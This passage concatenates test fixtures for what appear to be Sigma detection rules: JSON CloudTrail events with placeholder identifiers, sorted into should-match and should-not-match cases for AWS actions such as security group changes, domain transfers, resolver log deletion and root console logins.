"sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteFileSystem", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_mount_modified_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticfilesystem.amazonaws.com", 27 | "eventName": "DeleteMountTarget", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteMountTarget", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_created_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticache.amazonaws.com", 27 | "eventName": "CreateCacheSecurityGroup", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateCacheSecurityGroup", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_rds_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "AuthorizeDBSecurityGroupIngress", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AuthorizeDBSecurityGroupIngress", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route53resolver_deleteresolver_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "route53resolver.amazonaws.com", 27 | "eventName": "DeleteResolverQueryLogConfig", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteResolverQueryLogConfig", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_lock_disabled_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "route53.amazonaws.com", 27 | "eventName": "DisableDomainTransferLock", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DisableDomainTransferLock", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_ingress_egress_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "AuthorizeSecurityGroupEgress", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AuthorizeSecurityGroupEgress", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_modified_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticache.amazonaws.com", 27 | "eventName": "DeleteCacheSecurityGroup", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteCacheSecurityGroup", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_root_account_usage_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.08", 5 | "userIdentity": { 6 | "type": "Root", 7 | "principalId": "111122223333", 8 | "arn": "arn:aws:iam::111122223333:root", 9 | "accountId": "111122223333", 10 | "accessKeyId": "" 11 | }, 12 | "eventTime": "2023-07-12T13:35:31Z", 13 | "eventSource": "signin.amazonaws.com", 14 | "eventName": "ConsoleLogin", 15 | "awsRegion": "us-east-1", 16 | "sourceIPAddress": "192.0.2.0", 17 | "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", 18 | "requestParameters": null, 19 | "responseElements": { 20 | "ConsoleLogin": "Success" 21 | }, 22 | "additionalEventData": { 23 | "LoginTo": "https://console.aws.amazon.com/console/home?hashArgs=%23&isauthcode=true&nc2=h_ct&src=header-signin&state=hashArgsFromTB_ap-southeast-2_example80afacd389", 24 | "MobileVersion": "No", 25 | "MFAUsed": "No" 26 | }, 27 | "eventID": "4217cc13-7328-4820-a90c-EXAMPLE8002e6", 28 | "readOnly": false, 29 | "eventType": "AwsConsoleSignIn", 30 | "managementEvent": true, 31 | "recipientAccountId": "111122223333", 32 | "eventCategory": "Management", 33 | "tlsDetails": { 34 | "tlsVersion": "TLSv1.3", 35 | "cipherSuite": "TLS_AES_128_GCM_SHA256", 36 | "clientProvidedHostHeader": "signin.aws.amazon.com" 37 | } 38 | } 39 | ], 40 | "should_not_match": [ 41 | { 42 | "eventVersion": "1.09", 43 | "userIdentity": { 44 | "type": "AssumedRole", 45 | "principalId": "AROEXAMPLE", 46 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 47 | "accountId": "123456789012", 48 | "accessKeyId": "ASIAXXXXXX", 49 | "sessionContext": { 50 | "sessionIssuer": { 51 | "type": "Role", 52 | "principalId": "AROEXAMPLE", 53 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 54 | "accountId": "123456789012", 55 | "userName": "ExampleUserName" 56 | }, 57 | "attributes": { 58 | "creationDate": "2025-03-09T16:39:29Z", 59 | "mfaAuthenticated": "false" 60 | } 61 | } 62 | }, 63 | "eventTime": "2025-03-09T16:39:48Z", 64 | "eventSource": "notifications.amazonaws.com", 65 | "eventName": "ListNotificationHubs", 66 | "awsRegion": "us-east-1", 67 | "sourceIPAddress": "1.2.3.4", 68 | "userAgent": "ExampleAgent/1.0", 69 | "requestParameters": null, 70 | "responseElements": null, 71 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 72 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 73 | "readOnly": true, 74 | "eventType": "AwsApiCall", 75 | "managementEvent": true, 76 | "recipientAccountId": "123456789012", 77 | "eventCategory": "Management" 78 | } 79 | ] 80 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_to_another_account_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "route53.amazonaws.com", 27 | "eventName": "TransferDomainToAnotherAwsAccount", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "TransferDomainToAnotherAwsAccount", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_loadbalancer_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticloadbalancing.amazonaws.com", 27 | "eventName": "ApplySecurityGroupsToLoadBalancer", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ApplySecurityGroupsToLoadBalancer", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | 